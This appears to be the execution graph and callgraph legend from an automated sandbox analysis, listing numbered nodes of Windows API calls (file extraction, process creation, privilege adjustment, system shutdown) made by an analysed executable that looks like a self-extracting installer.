                                                                                              Execution Graph

                                                                                              Execution Coverage:29.4%
                                                                                              Dynamic/Decrypted Code Coverage:74.9%
                                                                                              Signature Coverage:42.7%
                                                                                              Total number of Nodes:705
                                                                                              Total number of Limit Nodes:21
                                                                                              execution_graph 3286 1002e53 3287 1002e65 3286->3287 3288 1002f1b EndDialog 3286->3288 3290 1002eb0 3287->3290 3291 1002e6b 3287->3291 3289 1002f17 3288->3289 3290->3289 3292 1002eb7 SetEvent CreateEventW 3290->3292 3291->3289 3295 1002ea2 SetEvent 3291->3295 3296 1002e89 SetParent Sleep 3291->3296 3293 1002ee2 3292->3293 3294 1002efe 3292->3294 3293->3294 3297 1002ee6 WaitForMultipleObjects CloseHandle 3293->3297 3298 1002d78 10 API calls 3294->3298 3295->3289 3296->3295 3297->3294 3299 1002f03 3298->3299 3299->3289 3300 1002f0c TerminateProcess 3299->3300 3300->3289 2526 1005899 InitializeCriticalSectionAndSpinCount #17 GetProcessHeap 2590 1002fb2 2526->2590 2529 100590c 2592 100400d GetModuleFileNameA 2529->2592 2533 1005e6a 2536 1005e72 DeleteCriticalSection 2533->2536 2537 1005e83 ExitProcess 2533->2537 2534 1005960 CreateEventA CreateThread 2539 1005989 WaitForSingleObject 2534->2539 2576 1005922 2534->2576 3269 1003941 DialogBoxParamA 2534->3269 2535 1005919 2800 10027cb GetVersionExA 2535->2800 2536->2537 2540 10059aa 2539->2540 2539->2576 2541 10059e4 SendDlgItemMessageA SendDlgItemMessageA SendDlgItemMessageA 2540->2541 2542 10059b8 Sleep ShowWindow SetParent 2540->2542 2543 1005a25 2541->2543 2542->2543 2544 1005a96 2543->2544 2608 1003c0f CreateFileA 2543->2608 2615 1004f6b 2544->2615 2548 1005a9b 2550 1005b53 2548->2550 2551 1005ab8 8 API calls 2548->2551 2552 1005b98 2548->2552 2549 1005a39 2612 100673e 2549->2612 2700 10076cb 2550->2700 2551->2550 2555 1005ba8 CreateFileA 2552->2555 2558 1005bcb GetFileSize 2555->2558 2555->2576 2556 1005b6d 2556->2552 2564 1005c3b 2556->2564 2556->2576 2557 1005a76 2557->2544 2560 1005a89 ShowWindow 2557->2560 2557->2576 2804 1003be7 RtlAllocateHeap 2558->2804 2560->2544 2562 1005be9 ReadFile 2563 1005c1f CloseHandle 2562->2563 2565 1005c02 2562->2565 2566 1005c34 DeleteFileA 2563->2566 2563->2576 2567 1005c56 2564->2567 2711 10046b9 2564->2711 2565->2563 2566->2564 2568 1005dd6 2567->2568 2572 1005c76 2567->2572 2567->2576 2569 1005e15 2568->2569 2570 1005dde ShowWindow LoadStringA MessageBoxA 2568->2570 2569->2533 2573 1005dca 2569->2573 2570->2569 2574 1005c91 SetEnvironmentVariableA SetEnvironmentVariableA SetEnvironmentVariableA 2572->2574 2575 1005c7e SendDlgItemMessageA 2572->2575 2573->2569 2573->2576 2826 1003972 OpenEventA 2573->2826 2792 10037bf GetEnvironmentVariableA 2574->2792 2575->2574 2576->2533 2582 1005905 2576->2582 2580 1005cca ExpandEnvironmentStringsA 2581 1005cec 2580->2581 2580->2582 2581->2582 2583 1005d36 CreateProcessA 2581->2583 2863 1003892 2582->2863 2583->2582 2584 1005d80 2583->2584 2585 1005d95 WaitForSingleObject GetExitCodeProcess CloseHandle 2584->2585 2586 1005d88 ShowWindow 2584->2586 2808 1002821 2585->2808 2586->2585 2591 1002fb4 CreateEventA 2590->2591 2591->2529 2591->2582 2593 1004030 2592->2593 2875 1003e3a 2593->2875 2598 1004475 2598->2534 2598->2535 2599 100406d 2600 100421e GetFileAttributesA 2599->2600 2604 1004241 2599->2604 2600->2599 2600->2604 2601 1004333 _strnicmp 2602 100436a _strnicmp 2601->2602 2601->2604 2602->2604 2603 1004448 _strnicmp 2603->2604 2604->2598 2604->2601 2604->2603 2605 100441c _strnicmp 2604->2605 2606 10043e8 _strnicmp 2604->2606 2607 1003892 29 API calls 2604->2607 2605->2604 2606->2604 2607->2602 2609 1003c37 2608->2609 2610 1003c3d SetFilePointer 2608->2610 2611 1003892 29 API calls 2609->2611 2610->2549 2611->2610 2905 1003c58 ReadFile 2612->2905 2613 1006756 2613->2557 2616 1004fe4 2615->2616 2617 1004ff0 2615->2617 2618 10045eb 36 API calls 2616->2618 2621 100555c 2617->2621 2909 1003d02 AllocateAndInitializeSid 2617->2909 2618->2617 2625 10062ff 4 API calls 2621->2625 2622 1005022 InitializeSecurityDescriptor 2623 10050b5 2622->2623 2624 1005038 InitializeAcl 2622->2624 2626 10050e6 GetSystemDirectoryA 2623->2626 2630 10050d1 GetCurrentDirectoryA 2623->2630 2624->2623 2628 1005050 AddAccessAllowedAce 2624->2628 2629 1005567 2625->2629 2923 10029c2 GetSystemDirectoryA 2626->2923 2627 1003892 29 API calls 2632 100559d 2627->2632 2628->2623 2633 1005071 AddAccessAllowedAce 2628->2633 2629->2548 2634 10054ce 2630->2634 2636 1005702 2632->2636 2637 10055d2 2632->2637 2696 10055e4 2632->2696 2633->2623 2635 1005087 AddAccessAllowedAce 2633->2635 2638 1005570 2634->2638 2643 10054e8 2634->2643 2635->2623 2639 100509d SetSecurityDescriptorDacl 2635->2639 2640 100572a 2636->2640 2645 1005712 strstr 2636->2645 2649 10055ec DosDateTimeToFileTime LocalFileTimeToFileTime SetFileTime CloseHandle 2637->2649 2637->2696 2638->2621 2644 10045eb 36 API calls 2638->2644 2639->2623 2646 1005789 2640->2646 2652 100573a _stricmp 2640->2652 2641 10062ff 4 API calls 2647 1005892 2641->2647 2642 100512c QueryDosDeviceA 2648 100515b _strlwr strstr 2642->2648 2654 1005112 2642->2654 2643->2621 2650 10054ed DialogBoxParamA 2643->2650 2657 100501b 2643->2657 2682 10045eb 36 API calls 2643->2682 2651 100558a 2644->2651 2645->2640 2645->2696 2661 100579e SendDlgItemMessageA 2646->2661 2663 10057ad 2646->2663 2670 100564d 2646->2670 2647->2548 2653 1005184 strstr 2648->2653 2648->2654 2655 1005644 2649->2655 2656 1005667 2649->2656 2650->2643 2650->2657 2651->2621 2651->2657 2652->2646 2658 100574e 2652->2658 2653->2654 2654->2642 2674 1005295 2654->2674 2675 10051c5 GetDiskFreeSpaceA 2654->2675 2935 1002b13 GetDriveTypeA 2654->2935 2943 10028d9 SetErrorMode SetErrorMode GetTickCount 2654->2943 2660 1005657 SendDlgItemMessageA 2655->2660 2655->2670 2664 10056a0 2656->2664 2666 1005684 MoveFileExA 2656->2666 2657->2627 2662 1003be7 30 API calls 2658->2662 2660->2656 2661->2663 2662->2670 2966 100447f 2663->2966 2668 1003e3a 30 API calls 2664->2668 2664->2696 2665 1003892 29 API calls 2665->2696 2666->2664 2666->2670 2680 10056b0 2668->2680 2670->2665 2670->2696 2672 1005836 CreateFileA 2676 10057e4 GetLastError 2672->2676 2677 100585a SetFilePointer SetEndOfFile SetFilePointer 2672->2677 2673 1005347 CryptAcquireContextA 2678 100545a 2673->2678 2689 1005365 2673->2689 2674->2657 2674->2673 2675->2654 2679 100581a 2676->2679 2690 10057ef 2676->2690 2677->2696 2684 1005471 GetSystemTime SystemTimeToFileTime 2678->2684 2679->2670 2971 1004590 2679->2971 2687 1003e3a 30 API calls 2680->2687 2681 100537c CryptGenRandom 2685 1005392 sprintf 2681->2685 2681->2689 2682->2643 2976 1002cae 2684->2976 2685->2689 2691 10056e5 2687->2691 2689->2681 2693 10053c6 sprintf 2689->2693 2698 1005443 CryptReleaseContext 2689->2698 2953 10045eb 2689->2953 2690->2672 2690->2679 2980 10044ad 2690->2980 2695 1003e3a 30 API calls 2691->2695 2693->2689 2693->2693 2695->2696 2696->2641 2697 10045eb 36 API calls 2699 10054bd 2697->2699 2698->2634 2698->2678 2699->2634 2699->2657 2701 1007710 2700->2701 2989 1006f96 2701->2989 2703 1007720 2705 10077e2 2703->2705 3009 1006a49 2703->3009 2705->2556 2707 100774f 2707->2705 2708 1006a49 SetFilePointer 2707->2708 2710 1004f6b 102 API calls 2707->2710 3012 1006ef2 2707->3012 3017 1007575 2707->3017 2708->2707 2710->2707 3153 10061d3 2711->3153 2713 1004906 2714 10061d3 6 API calls 2713->2714 2730 1004916 2714->2730 2715 1004ae3 2718 10061d3 6 API calls 2715->2718 2717 100471e SendDlgItemMessageA 2736 10046ee 2717->2736 2731 1004af3 2718->2731 2719 1004cac 3158 100370b 2719->3158 2722 100608f 6 API calls 2722->2730 2723 100495d SendDlgItemMessageA 2723->2730 2724 10061d3 6 API calls 2740 1004cc2 2724->2740 2725 100608f 6 API calls 2725->2731 2726 1004b3b SendDlgItemMessageA 2726->2731 2727 1004e22 3161 10061f9 2727->3161 2729 1004e38 2732 1004ea8 2729->2732 2746 1004e57 strchr 2729->2746 2730->2715 2730->2722 2730->2723 2733 10049c6 strstr 2730->2733 2731->2719 2731->2725 2731->2726 2738 1004b88 _strlwr 2731->2738 2739 10061f9 7 API calls 2732->2739 2733->2730 2735 10049e2 2733->2735 2734 10047ba strstr 2734->2736 2737 10047d6 2734->2737 2742 1004590 31 API calls 2735->2742 2749 100447f 30 API calls 2735->2749 2736->2713 2736->2717 2736->2734 3192 100608f 2736->3192 2743 1004590 31 API calls 2737->2743 2750 100447f 30 API calls 2737->2750 2744 100360c 11 API calls 2738->2744 2758 1004eb9 2739->2758 2740->2727 2741 100608f 6 API calls 2740->2741 2745 1004cfb strstr 2740->2745 2741->2740 2742->2735 2743->2737 2778 1004ba1 2744->2778 2745->2740 2747 1004d17 FindFirstFileA 2745->2747 2748 1004e75 2746->2748 2789 1004e94 2746->2789 2747->2740 2753 1004d3a strrchr 2747->2753 2767 1003e3a 30 API calls 2748->2767 2754 1004a01 SetFileAttributesA CopyFileA 2749->2754 2755 10047f5 SetFileAttributesA 2750->2755 2751 1004f51 2756 10062ff 4 API calls 2751->2756 2752 1004f3f SendDlgItemMessageA 2752->2751 2770 1004d4e 2753->2770 2760 1004aa7 SetFileAttributesA 2754->2760 2761 1004a2e GetLastError 2754->2761 3169 100360c 2755->3169 2757 1004f62 2756->2757 2757->2567 2765 1003e3a 30 API calls 2758->2765 2758->2789 2759 1004de1 FindNextFileA 2768 1004dfc FindClose 2759->2768 2759->2770 2760->2730 2761->2760 2777 1004a39 2761->2777 2763 1004c37 _strlwr 2763->2778 2764 1004bca GetLastError 2764->2778 2769 1004ee1 2765->2769 2766 1004d63 SendDlgItemMessageA 2766->2770 2767->2789 2768->2740 2779 1003e3a 30 API calls 2769->2779 2770->2759 2770->2766 2770->2770 2773 1004d91 DeleteFileA 2770->2773 2771 100453f 35 API calls 2771->2777 2772 10044ad 34 API calls 2772->2778 2773->2759 2776 1004da2 Sleep SetFileAttributesA DeleteFileA 2773->2776 2774 1004848 GetLastError 2774->2736 2790 1004812 2774->2790 2775 1004be6 MoveFileA 2775->2778 2776->2759 2780 1004dd0 2776->2780 2777->2760 2777->2771 2781 1004a79 CopyFileA 2777->2781 2778->2731 2778->2763 2778->2764 2778->2772 2778->2775 2786 1004c11 MoveFileA 2778->2786 2783 1004f0a strrchr 2779->2783 2784 100447f 30 API calls 2780->2784 2785 100373c 2 API calls 2781->2785 2787 1004f24 2783->2787 2784->2759 2785->2777 2786->2778 2788 1003e3a 30 API calls 2787->2788 2788->2789 2789->2751 2789->2752 2790->2736 2790->2774 3180 100453f 2790->3180 3187 100373c 2790->3187 2793 1003889 2792->2793 2794 10037dd 2792->2794 2793->2580 2793->2581 2795 10037f3 CreateFileA 2794->2795 2795->2793 2796 1003817 WriteFile 2795->2796 2797 1003863 2796->2797 2798 1003876 CloseHandle 2796->2798 2797->2798 2799 1003868 SetEnvironmentVariableA 2797->2799 2798->2793 2799->2793 2801 10027f9 2800->2801 2802 10062ff 4 API calls 2801->2802 2803 100281a 2802->2803 2803->2534 2803->2576 2805 1003c01 2804->2805 2806 1003c08 2804->2806 2807 1003892 29 API calls 2805->2807 2806->2562 2806->2563 2807->2806 2809 10028b4 2808->2809 2810 1002835 SetFilePointer ReadFile 2808->2810 2809->2573 2813 1002d78 EnterCriticalSection 2809->2813 2810->2809 2811 1002863 2810->2811 2811->2809 2812 100287d _snprintf 2811->2812 2812->2809 2814 1002da1 2813->2814 2815 1002d97 CloseHandle 2813->2815 2816 1002dab CloseHandle 2814->2816 2817 1002db5 2814->2817 2815->2814 2816->2817 2818 1002dcf DeleteFileA 2817->2818 2822 1002dea MoveFileExA 2817->2822 2824 1002dfd 2817->2824 2818->2817 2820 1002dda GetLastError 2818->2820 2819 1002e3f LeaveCriticalSection 2819->2573 2820->2817 2821 1002e11 RemoveDirectoryA 2823 1002e1c GetLastError 2821->2823 2821->2824 2822->2817 2823->2824 2824->2819 2824->2821 2825 1002e2c MoveFileExA 2824->2825 2825->2824 3218 100346e 2826->3218 2829 10039c3 WaitForSingleObject CloseHandle 2831 10039ef 2829->2831 2830 10039d8 Sleep 2830->2831 3227 10034f4 2831->3227 2835 1003a09 2837 100346e 8 API calls 2835->2837 2836 1003a1a LoadLibraryA 2838 1003a41 WaitForSingleObject 2836->2838 2839 1003a2f GetProcAddress 2836->2839 2840 1003a13 2837->2840 2841 1003a52 2838->2841 2842 1003a5a 2838->2842 2839->2838 2845 10062ff 4 API calls 2840->2845 2843 1003bb8 2841->2843 2844 1003bac FreeLibrary 2841->2844 2842->2841 2846 1003a82 InitiateSystemShutdownA 2842->2846 2850 1003a9b GetLastError 2842->2850 2851 1003ab0 WaitForSingleObject 2842->2851 2853 1003acd GetLastError 2842->2853 3242 100358b 2843->3242 2844->2843 2848 1003bde 2845->2848 2846->2842 2848->2576 2850->2841 2850->2842 2851->2841 2851->2842 2852 100346e 8 API calls 2852->2840 3237 1003791 2853->3237 2855 1003ae6 2856 100346e 8 API calls 2855->2856 2857 1003af5 GetVersionExA 2856->2857 2857->2841 2858 1003b1b GetVersionExA 2857->2858 2858->2841 2859 1003b37 GetSystemDirectoryA 2858->2859 2859->2841 2860 1003b4d strchr CreateFileA 2859->2860 2860->2841 2861 1003b85 FlushFileBuffers CloseHandle 2860->2861 2861->2841 2862 1003b99 NtShutdownSystem 2861->2862 2862->2841 2864 10038a6 GetLastError 2863->2864 2865 10038ae 2863->2865 2864->2865 2866 100390f 2865->2866 3263 1002d09 2865->3263 2867 1002d78 10 API calls 2866->2867 2869 1003914 2867->2869 2872 1003922 DeleteCriticalSection 2869->2872 2873 1003934 ExitProcess 2869->2873 2871 100346e 8 API calls 2874 10038d5 LoadStringA MessageBoxA 2871->2874 2872->2873 2874->2866 2876 1003e45 2875->2876 2876->2876 2877 1003be7 30 API calls 2876->2877 2878 1003e59 2877->2878 2879 1003016 CreateFileA 2878->2879 2880 1003055 ReadFile 2879->2880 2881 10033c9 2879->2881 2882 10033bb CloseHandle 2880->2882 2883 100307d 2880->2883 2900 10062ff 2881->2900 2882->2881 2883->2882 2886 10030d4 2883->2886 2887 1003094 SetFilePointer 2883->2887 2885 10033d2 GetCommandLineA 2885->2599 2886->2882 2889 100311e RtlAllocateHeap 2886->2889 2887->2882 2888 10030b4 ReadFile 2887->2888 2888->2882 2888->2886 2889->2882 2890 100313f SetFilePointer 2889->2890 2890->2882 2891 1003159 ReadFile 2890->2891 2891->2882 2893 1003175 2891->2893 2892 10031e5 2892->2882 2893->2882 2893->2892 2894 10032a2 WideCharToMultiByte 2893->2894 2895 1003311 HeapAlloc 2893->2895 2898 1003378 HeapAlloc 2893->2898 2894->2893 2895->2882 2896 100332e WideCharToMultiByte GetEnvironmentVariableA 2895->2896 2896->2893 2897 1003350 WideCharToMultiByte 2896->2897 2897->2893 2898->2882 2899 100338d WideCharToMultiByte SetEnvironmentVariableA 2898->2899 2899->2893 2901 1006310 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2900->2901 2902 1006307 2900->2902 2901->2885 2902->2901 2904 100630f 2902->2904 2904->2885 2906 1003c76 2905->2906 2907 1003c7d 2905->2907 2908 1003892 29 API calls 2906->2908 2907->2613 2908->2907 2910 1003d57 GetCurrentProcess OpenProcessToken 2909->2910 2911 1003d6e 2909->2911 2910->2911 2912 1003d75 GetTokenInformation 2910->2912 2913 10062ff 4 API calls 2911->2913 2912->2911 2914 1003d99 GetLengthSid 2912->2914 2915 1003e31 2913->2915 2916 1003be7 30 API calls 2914->2916 2915->2622 2915->2657 2917 1003dae 2916->2917 2918 1003db5 GetTokenInformation 2917->2918 2922 1003dfa 2917->2922 2918->2911 2919 1003de6 GetLengthSid 2918->2919 2921 1003be7 30 API calls 2919->2921 2920 1003892 29 API calls 2920->2911 2921->2922 2922->2911 2922->2920 2924 1002a0a LoadLibraryA 2923->2924 2925 1002afc 2923->2925 2924->2925 2929 1002a3b GetProcAddress 2924->2929 2926 10062ff 4 API calls 2925->2926 2927 1002b0c 2926->2927 2927->2654 2930 1002af5 FreeLibrary 2929->2930 2931 1002a57 GetProcAddress 2929->2931 2930->2925 2931->2930 2932 1002a6d GetProcAddress 2931->2932 2933 1002a8e 2932->2933 2934 1002a7c GetProcAddress 2932->2934 2933->2930 2934->2933 2936 1002b60 CreateFileA 2935->2936 2937 1002b4f 2935->2937 2936->2937 2938 1002b82 DeviceIoControl 2936->2938 2940 10062ff 4 API calls 2937->2940 2939 1002b9f CloseHandle 2938->2939 2939->2937 2942 1002bbb 2940->2942 2942->2654 2944 100291e sprintf CreateDirectoryA 2943->2944 2945 1002954 GetLastError 2944->2945 2946 1002975 RemoveDirectoryA 2944->2946 2947 10029a0 SetErrorMode 2945->2947 2948 1002961 2945->2948 2949 1002973 2946->2949 2950 1002986 MoveFileExA 2946->2950 2951 10062ff 4 API calls 2947->2951 2948->2944 2948->2949 2949->2947 2950->2949 2952 10029b9 2951->2952 2952->2654 2954 100460b 2953->2954 2954->2954 2955 1004590 31 API calls 2954->2955 2956 1004651 2955->2956 2957 10046a1 2956->2957 2958 1004657 GetFileAttributesA 2956->2958 2961 10062ff 4 API calls 2957->2961 2958->2957 2959 1004669 2958->2959 2959->2957 2960 100466d LoadLibraryA 2959->2960 2960->2957 2962 100467c GetProcAddress 2960->2962 2963 10046b0 2961->2963 2962->2957 2964 100468c DecryptFileA 2962->2964 2963->2689 2964->2957 2965 100469b GetLastError 2964->2965 2965->2957 2967 1003be7 30 API calls 2966->2967 2968 100448c 2967->2968 2969 1003e3a 30 API calls 2968->2969 2970 1004497 2969->2970 2970->2672 2972 10045dd 2971->2972 2975 10045ac 2971->2975 2972->2672 2973 10045b1 CreateDirectoryA 2973->2975 2974 100447f 30 API calls 2974->2975 2975->2972 2975->2973 2975->2974 2977 1002ccc 2976->2977 2978 10062ff 4 API calls 2977->2978 2979 1002d00 2978->2979 2979->2697 2981 10044c1 2980->2981 2981->2981 2982 10044cb strrchr 2981->2982 2983 10044dc _stricmp 2982->2983 2984 100452c 2982->2984 2983->2984 2985 10044ee 2983->2985 2984->2690 2986 10044f1 sprintf GetFileAttributesA 2985->2986 2986->2986 2987 1004521 2986->2987 2988 100447f 30 API calls 2987->2988 2988->2984 2990 1006fbd 2989->2990 3004 1003c0f 31 API calls 2990->3004 2991 1006fdd 3003 1007024 2991->3003 3006 1003c0f 31 API calls 2991->3006 2992 1006ffb 2992->3003 3007 1003c58 30 API calls 2992->3007 2993 100701c 2994 100718d 2993->2994 2993->3003 3031 10069bb 2993->3031 2996 10071ca 2994->2996 2998 10069bb SetFilePointer 2994->2998 2994->3003 2996->3003 3028 1002c7c 2996->3028 2997 1007177 2999 10069bb SetFilePointer 2997->2999 2997->3003 3000 10071b8 2998->3000 2999->2994 3002 10069bb SetFilePointer 3000->3002 3000->3003 3001 10071ea 3001->3003 3008 1002c7c SetFilePointer 3001->3008 3002->2996 3003->2703 3004->2991 3006->2992 3007->2993 3008->3003 3011 1002c7c SetFilePointer 3009->3011 3010 1006a60 3010->2707 3011->3010 3016 1003c58 30 API calls 3012->3016 3013 1006f0a 3014 10069bb SetFilePointer 3013->3014 3015 1006f24 3013->3015 3014->3015 3015->2707 3016->3013 3018 1007632 3017->3018 3019 100758b 3017->3019 3027 1004f6b 102 API calls 3018->3027 3036 100750b 3019->3036 3021 1007609 3021->2707 3022 10075ab 3022->3021 3023 1007463 34 API calls 3022->3023 3024 10075c5 3022->3024 3023->3022 3024->3018 3024->3021 3042 1003c87 3024->3042 3048 1007463 3024->3048 3027->3021 3029 1002c92 SetFilePointer 3028->3029 3030 1002c8a 3028->3030 3029->3001 3030->3029 3034 1002c7c SetFilePointer 3031->3034 3032 10069d3 3033 1006a23 3032->3033 3035 1002c7c SetFilePointer 3032->3035 3033->2997 3034->3032 3035->3033 3037 100751d 3036->3037 3038 1007522 3036->3038 3037->3022 3038->3037 3060 1007241 3038->3060 3040 1007551 3040->3037 3041 1007463 34 API calls 3040->3041 3041->3037 3043 1003c95 3042->3043 3044 1003cdc WriteFile 3042->3044 3043->3024 3044->3043 3045 1003cf5 3044->3045 3046 1003892 29 API calls 3045->3046 3047 1003cfc 3046->3047 3049 1007480 3048->3049 3050 1007486 3048->3050 3099 1007339 3049->3099 3054 10074de 3050->3054 3094 100687b 3050->3094 3053 1007499 3053->3054 3055 10074bf 3053->3055 3056 1007339 34 API calls 3053->3056 3054->3024 3055->3054 3106 1006da8 3055->3106 3058 10074ad 3056->3058 3058->3054 3059 100687b 30 API calls 3058->3059 3059->3055 3067 1002c7c SetFilePointer 3060->3067 3061 1007273 3062 10072d1 3061->3062 3068 1003c58 30 API calls 3061->3068 3062->3040 3063 1007291 3063->3062 3066 1002c7c SetFilePointer 3063->3066 3064 10072b0 3064->3062 3069 1006f44 3064->3069 3066->3064 3067->3061 3068->3063 3070 1006f60 3069->3070 3072 1006f5b 3069->3072 3070->3072 3073 1006b75 3070->3073 3072->3062 3074 1006ba5 3073->3074 3075 1006be2 3073->3075 3074->3075 3076 1007942 30 API calls 3074->3076 3077 1006bae 3074->3077 3075->3077 3080 1003be7 30 API calls 3075->3080 3076->3075 3077->3072 3078 1006c5c 3078->3077 3081 1007942 3078->3081 3080->3078 3082 100795d 3081->3082 3083 100795f 3081->3083 3082->3077 3085 1007984 3083->3085 3086 1007b55 3083->3086 3085->3077 3087 1007bad 3086->3087 3089 1007bb3 3086->3089 3090 1007bce 3087->3090 3089->3085 3091 1007be6 3090->3091 3091->3091 3093 1003be7 30 API calls 3091->3093 3092 1007c15 3092->3089 3093->3092 3097 1003c58 30 API calls 3094->3097 3095 100689e 3096 10068dc 3095->3096 3098 1003c58 30 API calls 3095->3098 3096->3053 3097->3095 3098->3096 3101 1007387 3099->3101 3100 1006f96 33 API calls 3100->3101 3101->3100 3102 1007417 3101->3102 3103 1007241 32 API calls 3101->3103 3104 100740e 3101->3104 3102->3050 3103->3101 3104->3102 3105 1006ef2 31 API calls 3104->3105 3105->3104 3107 1006dd1 3106->3107 3108 1006dc8 3106->3108 3107->3054 3108->3107 3110 1007a04 3108->3110 3111 1007a19 3110->3111 3112 1007a1e 3110->3112 3111->3107 3113 1007a29 3112->3113 3115 1007af2 3112->3115 3113->3107 3116 1007b20 3115->3116 3119 1007e0d 3116->3119 3124 1007e23 3119->3124 3120 1008002 3137 10090c9 3120->3137 3122 1007b29 3122->3113 3124->3120 3124->3122 3126 1009507 3124->3126 3130 1009438 3124->3130 3128 100951a 3126->3128 3127 1009534 3127->3124 3128->3127 3141 1009769 3128->3141 3145 100911e 3130->3145 3133 1009460 3133->3124 3134 100911e 4 API calls 3135 1009487 3134->3135 3135->3133 3136 100911e 4 API calls 3135->3136 3136->3133 3138 1009114 3137->3138 3139 10090dc 3137->3139 3138->3122 3139->3138 3149 1007d48 3139->3149 3142 1009796 3141->3142 3143 10062ff 4 API calls 3142->3143 3144 100988d 3143->3144 3144->3127 3148 1009146 3145->3148 3146 10062ff 4 API calls 3147 100942b 3146->3147 3147->3133 3147->3134 3148->3146 3150 1007d67 3149->3150 3151 10062ff 4 API calls 3150->3151 3152 1007e04 3151->3152 3152->3138 3196 1005f91 3153->3196 3155 10061f0 3155->2736 3157 100608f 6 API calls 3157->3155 3159 1003722 3158->3159 3160 1003714 FreeLibrary 3158->3160 3159->2724 3160->3159 3162 10061d3 6 API calls 3161->3162 3165 1006219 3162->3165 3163 1006276 3164 10062ff 4 API calls 3163->3164 3166 1006283 3164->3166 3165->3163 3167 100622d _strlwr 3165->3167 3168 100608f 6 API calls 3165->3168 3166->2729 3167->3165 3168->3165 3170 10036d3 3169->3170 3171 100362f 3169->3171 3172 10062ff 4 API calls 3170->3172 3173 10061f9 7 API calls 3171->3173 3174 1003702 3172->3174 3175 1003640 3173->3175 3174->2790 3176 1003672 GetSystemDirectoryA 3175->3176 3177 100365d 3175->3177 3176->3177 3178 1003698 LoadLibraryA 3177->3178 3178->3170 3179 10036ae GetProcAddress GetProcAddress 3178->3179 3179->3170 3181 10044ad 34 API calls 3180->3181 3182 1004555 3181->3182 3183 10044ad 34 API calls 3182->3183 3184 1004561 3183->3184 3185 1004580 3184->3185 3186 1004572 MoveFileA 3184->3186 3185->2790 3186->3185 3188 100374d MoveFileA 3187->3188 3189 100375b 3187->3189 3188->3189 3190 1003765 MoveFileExA 3189->3190 3191 1003775 3189->3191 3190->3191 3191->2790 3193 1006097 3192->3193 3194 10060b5 3193->3194 3211 1006010 3193->3211 3194->2736 3203 1005ef7 3196->3203 3198 1005ffb 3199 10062ff 4 API calls 3198->3199 3200 1006007 3199->3200 3200->3155 3200->3157 3201 1005fb1 3201->3198 3207 1005f6e 3201->3207 3204 1005f0a 3203->3204 3205 1005f42 3204->3205 3206 1005f46 strncpy _strlwr 3204->3206 3205->3201 3206->3205 3208 1005f7b 3207->3208 3209 1005ef7 2 API calls 3208->3209 3210 1005f88 3209->3210 3210->3201 3212 1005f6e 2 API calls 3211->3212 3216 1006030 3212->3216 3213 100607a 3214 10062ff 4 API calls 3213->3214 3215 1006086 3214->3215 3215->3193 3216->3213 3217 1005f6e 2 API calls 3216->3217 3217->3216 3219 1003494 3218->3219 3220 1003489 CloseHandle 3218->3220 3221 10034cc 3219->3221 3222 100349d CreateFileA 3219->3222 3220->3219 3224 10034e7 3221->3224 3225 10034dd CloseHandle 3221->3225 3223 10034c4 3222->3223 3222->3224 3252 10033db GetLastError 3223->3252 3224->2829 3224->2830 3225->3224 3228 1003517 3227->3228 3229 1003542 3228->3229 3230 1003526 NtOpenProcessToken 3228->3230 3229->2835 3229->2836 3231 1003538 3230->3231 3236 1003544 NtAdjustPrivilegesToken 3230->3236 3232 100346e 8 API calls 3231->3232 3232->3229 3234 1003579 NtClose 3234->3229 3235 100356e NtClose 3235->3229 3236->3234 3236->3235 3238 10037a6 3237->3238 3239 100379f 3237->3239 3260 1002779 3238->3260 3239->2855 3243 1003599 NtOpenProcessToken 3242->3243 3244 10035b5 3242->3244 3245 10035b7 NtAdjustPrivilegesToken 3243->3245 3246 10035ab 3243->3246 3244->2840 3244->2852 3248 10035d9 3245->3248 3249 10035cb NtClose 3245->3249 3247 100346e 8 API calls 3246->3247 3247->3244 3250 100346e 8 API calls 3248->3250 3249->3244 3251 10035e3 NtClose 3250->3251 3251->3244 3253 1003455 3252->3253 3254 10033f8 SetFilePointer 3252->3254 3255 1003458 SetLastError 3253->3255 3256 1003409 3254->3256 3255->3221 3256->3256 3257 1003410 WriteFile 3256->3257 3257->3255 3258 100342d WriteFile 3257->3258 3258->3253 3258->3255 3261 100278f _vsnprintf 3260->3261 3262 1002788 3260->3262 3261->3262 3262->2855 3264 1002d34 FormatMessageA 3263->3264 3265 1002d1d LoadStringA 3263->3265 3266 1002d6e 3264->3266 3267 1002d65 3264->3267 3265->3264 3265->3266 3266->2871 3268 1002cae 4 API calls 3267->3268 3268->3266 3270 1003963 3269->3270 3271 100396a 3269->3271 3272 1003892 29 API calls 3270->3272 3272->3271 3301 1003e7a 3302 1003e9f 3301->3302 3312 1003f96 EndDialog 3301->3312 3304 1003f99 LoadStringA SendMessageA SendDlgItemMessageA SendDlgItemMessageA 3302->3304 3306 1003eaa 3302->3306 3305 1003ec4 3304->3305 3310 10062ff 4 API calls 3305->3310 3306->3305 3307 1003eb8 3306->3307 3308 1003f6c SendDlgItemMessageA 3306->3308 3311 1003ebf 3307->3311 3307->3312 3309 1003e3a 30 API calls 3308->3309 3309->3312 3313 1004004 3310->3313 3311->3305 3314 1003ecb LoadStringA SHBrowseForFolderA 3311->3314 3312->3305 3315 1003f35 SHGetPathFromIDListA 3314->3315 3316 1003f5a SendMessageA 3314->3316 3315->3316 3317 1003f47 SendDlgItemMessageA 3315->3317 3316->3305 3317->3316 3318 1002c4b 3319 1002c6b 3318->3319 3320 1002c5c CloseHandle 3318->3320 3320->3319 3321 100654b _XcptFilter 3322 100628c 3323 10062a4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3322->3323 3324 100629d 3322->3324 3325 10062e7 3323->3325 3324->3323 3324->3325 3326 1002c2e HeapFree 3273 10063ff 3278 100640b 3273->3278 3274 100646e __set_app_type __p__fmode __p__commode 3275 10064b6 3274->3275 3276 10064cb 3275->3276 3277 10064bf __setusermatherr 3275->3277 3285 10065a1 _controlfp 3276->3285 3277->3276 3278->3274 3280 10064d0 _initterm __getmainargs _initterm 3281 100652e 3280->3281 3282 1006543 _cexit 3281->3282 3283 100653c exit 3281->3283 3284 1006578 3282->3284 3283->3282 3285->3280 3327 100655f 3328 1006572 _c_exit 3327->3328 3329 100656b _exit 3327->3329 3330 1006578 3328->3330 3329->3328

                                                                                              Callgraph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Opacity -> Relevance
                                                                                              • Disassembly available
